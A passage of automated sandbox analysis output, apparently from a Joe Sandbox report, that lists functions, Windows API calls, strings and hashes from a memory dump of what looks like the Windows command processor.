KERNEL32.DLL, xrefs: 00007FF683F850EB
CopyFileExW, xrefs: 00007FF683F85108
SetConsoleInputExeNameW, xrefs: 00007FF683F85143
IsDebuggerPresent, xrefs: 00007FF683F85122

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressHandleProcProcess$AllocCommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireAllocateBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
API String ID: 3614140610-3021193919
Opcode ID: 435433f7253096d870c33aa278a517d18c81e5400009277a10a2e2eb1186a394
Instruction ID: 23b0401f07aa73ff9a8488081d4f34875d8c4d3c3dfee07e56da378f0a27a011
Opcode Fuzzy Hash: 435433f7253096d870c33aa278a517d18c81e5400009277a10a2e2eb1186a394
Instruction Fuzzy Hash: 83C15E61A49A43D6FA089B12E8121B977A1FF89B91F4C813DD90EA77A5DF3CE445C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F837D8 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 269
registrythreadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF683F8380B
OpenThread.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF683F83821
HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F83845
RegOpenKeyExW.KERNELBASE ref: 00007FF683F83875
GetConsoleOutputCP.KERNELBASE ref: 00007FF683F838BF
GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F838DD
memset.MSVCRT ref: 00007FF683F83909
_setjmp.MSVCRT ref: 00007FF683F83952
GetConsoleOutputCP.KERNELBASE ref: 00007FF683F8398B
GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F839A2
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF683F8EA1F
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF683F8EA2F

Part of subcall function 00007FF683F85920: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,?,?,?,00000000,00000000,00000000,00007FF683F8B71F), ref: 00007FF683F85997
Part of subcall function 00007FF683F85920: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,?,?,?,00000000,00000000,00000000,00007FF683F8B71F), ref: 00007FF683F859C5

GetThreadLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F8EA41

Strings

DisableCMD, xrefs: 00007FF683F8EA18
Software\Policies\Microsoft\Windows\System, xrefs: 00007FF683F83867

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
API String ID: 2624720099-1920437939
Opcode ID: e0d6314462040d9132af36def7bdcbd46fb0756625f4788b6d15f19097c8c1f5
Instruction ID: 19f7e1d89ba0d592346e58dfe8be14b8ed3d7dc51a0ee28e646ff2ce5bfe54ad
Opcode Fuzzy Hash: e0d6314462040d9132af36def7bdcbd46fb0756625f4788b6d15f19097c8c1f5
Instruction Fuzzy Hash: 68C1CD31E48682CAFB18AB26A4131B86AA1FF49744F5C813DD90EF77A1DE3CA441C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F8823C Relevance: 15.1, APIs: 10, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileExW.KERNELBASE ref: 00007FF683F88280
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F8829D

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: ErrorFileFindFirstLast
String ID:
API String ID: 873889042-0
Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
Instruction ID: d6c641ecb066892704d4ac4549624bdc21c12140b09819f205484ab9ba73d512
Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
Instruction Fuzzy Hash: 76514D76A09B42C6EB148F12E446579BBA0FF49B91F4C813ACA1EA3750DF3CE454C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F82978 Relevance: 9.1, APIs: 6, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
Instruction ID: 8d41426a74cf0a472bd4185503e6bff933d93e4bc50d1ab604fb4cfa5acc8c84
Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
Instruction Fuzzy Hash: 16514A21B48682D5EB348F16A5462BAA290FF54BE4F4C4239DE6EA77D0DF3CE445C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F83C24 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 289
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF683F83D0C
towupper.MSVCRT ref: 00007FF683F83D2F
iswalpha.MSVCRT ref: 00007FF683F83D4F
towupper.MSVCRT ref: 00007FF683F83D75
GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F83DBF
GetFileAttributesW.KERNELBASE ref: 00007FF683F83E7E
GetFileAttributesW.KERNELBASE ref: 00007FF683F83EE9
SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF683F83F32
_local_unwind.MSVCRT ref: 00007FF683F84062
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F84067
_local_unwind.MSVCRT ref: 00007FF683F84098
_local_unwind.MSVCRT ref: 00007FF683F840B3
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F840B8
_local_unwind.MSVCRT ref: 00007FF683F840DE
_local_unwind.MSVCRT ref: 00007FF683F840F9
_local_unwind.MSVCRT ref: 00007FF683F84114

Strings

:, xrefs: 00007FF683F83D89

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
String ID: :
API String ID: 1809961153-336475711
Opcode ID: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
Instruction ID: 2f3dfcbc0ace6a3a57c2bcf7e3d8732cc037ef81520d573e9e57917ddceed6fb
Opcode Fuzzy Hash: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
Instruction Fuzzy Hash: E5D18136A4DB85C1EE28DB16E4562BAB7A1FF89740F48413AD94E937A4DF3CE444C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F82394 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 213
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00007FF683F823F1

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

GetModuleFileNameW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF683F82438

Part of subcall function 00007FF683F8081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF683F8084E

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F824DD
wcschr.MSVCRT ref: 00007FF683F8E12A
_wcsupr.MSVCRT ref: 00007FF683F8E146

Strings

KEYS, xrefs: 00007FF683F82498
PATHEXT, xrefs: 00007FF683F82459, 00007FF683F8E0FB
PATH, xrefs: 00007FF683F82444, 00007FF683F8E0E2
\CMD.EXE, xrefs: 00007FF683F8E22A
COMSPEC, xrefs: 00007FF683F82483, 00007FF683F8E28B
$P$G, xrefs: 00007FF683F82516
.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC, xrefs: 00007FF683F8E0F4
PROMPT, xrefs: 00007FF683F8246E, 00007FF683F8251D

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
API String ID: 2622545777-4197029667
Opcode ID: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
Instruction ID: eaad19f855abd7a193a2fa8cb4d5a21f0a7e8cb9c56eea5b8a4d39060127d6d9
Opcode Fuzzy Hash: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
Instruction Fuzzy Hash: CE916D62B49B82D5EE288F11D8562F863A1FF58B84F88413DC90EA77A5DF3CE505C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F80580 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_osfhandle.MSVCRT ref: 00007FF683F80589
SetConsoleMode.KERNELBASE ref: 00007FF683F8059E
_get_osfhandle.MSVCRT ref: 00007FF683F805AF
GetConsoleMode.KERNELBASE ref: 00007FF683F805C5
_get_osfhandle.MSVCRT ref: 00007FF683F805EF
GetConsoleMode.KERNELBASE ref: 00007FF683F80605
_get_osfhandle.MSVCRT ref: 00007FF683F80632
SetConsoleMode.KERNELBASE ref: 00007FF683F80647
_get_osfhandle.MSVCRT ref: 00007FF683F80684
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF683F80699
_get_osfhandle.MSVCRT ref: 00007FF683F8D891
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF683F8D8A6

Strings

CMD.EXE, xrefs: 00007FF683F8065F

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: ConsoleMode_get_osfhandle
String ID: CMD.EXE
API String ID: 1606018815-3025314500
Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
Instruction ID: 07029f768d5bd95390eb9d2d669cec95c23066216748ae7d001b4343f42a15c5
Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
Instruction Fuzzy Hash: 1141FC75A09643DBEA184B15E8561B87AA0FF8AB55F8C813DD90FE73A0DF3CA414C680

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F7B998 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 275
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF683F7CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF683F7B9A1,?,?,?,?,00007FF683F7D81A), ref: 00007FF683F7CDA6
Part of subcall function 00007FF683F7CD90: RtlAllocateHeap.NTDLL(?,?,?,00007FF683F7B9A1,?,?,?,?,00007FF683F7D81A), ref: 00007FF683F7CDBD

memset.MSVCRT ref: 00007FF683F7BA2B
wcschr.MSVCRT ref: 00007FF683F7BA8A
wcschr.MSVCRT ref: 00007FF683F7BAAA

Strings

=,;, xrefs: 00007FF683F7BC9C
:.\, xrefs: 00007FF683F7BAA3
=,;+/[] ", xrefs: 00007FF683F7BA83
-, xrefs: 00007FF683F8C3EA

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Heapwcschr$AllocateProcessmemset
String ID: -$:.\$=,;$=,;+/[] "
API String ID: 2060774286-969133440
Opcode ID: dc89a94961ffe0a46effd7ae4f27137a82837595701d7b92e3e722f9606081f8
Instruction ID: 82b96d0a470e99da23437de0a2c112eec7c1f250e1f3691b1833acd0ba7b0d75
Opcode Fuzzy Hash: dc89a94961ffe0a46effd7ae4f27137a82837595701d7b92e3e722f9606081f8
Instruction Fuzzy Hash: E8B1A421A0E682C1FA649B15948A27967B0FF4AB84F4D4239DE5EE77D4DF3CE841C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F7C620 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 312
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleTitleW.KERNELBASE ref: 00007FF683F7C65E
wcschr.MSVCRT ref: 00007FF683F7C792

Strings

:, xrefs: 00007FF683F7C9E2
/, xrefs: 00007FF683F7CA1B

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: ConsoleTitlewcschr
String ID: /$:
API String ID: 2364928044-4222935259
Opcode ID: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
Instruction ID: 70061e3b7d9801c4f007c685448250b413077f4f829a76dfee190beb5c5fb4ef
Opcode Fuzzy Hash: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
Instruction Fuzzy Hash: 95C1BF61E08682C1FA689B26D5163B962B1FF85B94F4C813DDA1EE72D5DF3CE845C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F88D80 Relevance: 9.1, APIs: 6, Instructions: 95
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF683F88DC4
_amsg_exit.MSVCRT ref: 00007FF683F88DE0
_initterm.MSVCRT ref: 00007FF683F88E64
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF683F88E91
exit.MSVCRT ref: 00007FF683F88EDE
_cexit.MSVCRT ref: 00007FF683F88EED

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
String ID:
API String ID: 4291973834-0
Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
Instruction ID: 0116b9965e9c2a7695f3d3df406f21add378a22d0c3ba955fb2801bc2cb02c38
Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
Instruction Fuzzy Hash: 2E41E321A48643C2FB649B52E99227963A1BF44388F08443EE95DF76E0DFBCE844C7C1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F84A14 Relevance: 7.5, APIs: 5, Instructions: 49
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF683F849F1), ref: 00007FF683F84A28
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF683F849F1), ref: 00007FF683F84A66
RtlAllocateHeap.NTDLL(?,?,00000000,00007FF683F849F1), ref: 00007FF683F84A7D
memmove.MSVCRT(?,?,00000000,00007FF683F849F1), ref: 00007FF683F84A9A
FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF683F849F1), ref: 00007FF683F84AA2

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: EnvironmentHeapStrings$AllocateFreeProcessmemmove
String ID:
API String ID: 647542462-0
Opcode ID: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
Instruction ID: 4b0cb3db8e202cbc5185a32b0dae58d4f0a633e81c8918ae351b4d89197abcbe
Opcode Fuzzy Hash: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
Instruction Fuzzy Hash: AC119E22A18B42C2DE149F42A406079BBA0FF89F84F4D9039DE4E67744DE3DE441C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F85CB4 Relevance: 7.5, APIs: 5, Instructions: 36synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF683F9C9EE,?,?,?,00007FF683F9EA6C,?,?,?,00007FF683F9E925), ref: 00007FF683F85CCB
GetExitCodeProcess.KERNELBASE(?,?,?,00007FF683F9C9EE,?,?,?,00007FF683F9EA6C,?,?,?,00007FF683F9E925), ref: 00007FF683F85CDF
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF683F85D03
fprintf.MSVCRT ref: 00007FF683F8F4A9
fflush.MSVCRT ref: 00007FF683F8F4C2

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
String ID:
API String ID: 1826527819-0
Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
Instruction ID: cd6908e673ccced85e9ac302b7de6c65c10f361cbdaff66bb5cc8de54d5f7e71
Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
Instruction Fuzzy Hash: 97012D3190C682CAEA045B25E4561B9BBA1FF8E759F485139E94FA73A2CF7C9044CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F83060 Relevance: 6.1, APIs: 4, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF683F81EA0: wcschr.MSVCRT ref: 00007FF683F81EB3

SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF683F792AC), ref: 00007FF683F830CA
SetErrorMode.KERNELBASE ref: 00007FF683F830DD
GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F830F6
SetErrorMode.KERNELBASE ref: 00007FF683F83106

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: ErrorMode$FullNamePathwcschr
String ID:
API String ID: 1464828906-0
Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
Instruction ID: cc0c5fec0e33b1db1fd4b9c4a612ecc00742845c0068f88a34b06df2ddea77d9
Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
Instruction Fuzzy Hash: 90310721E48612C2EB689F16A40107EB660FF59B84F5C8239DA5EE73E0DF7DE845C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F7CA40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

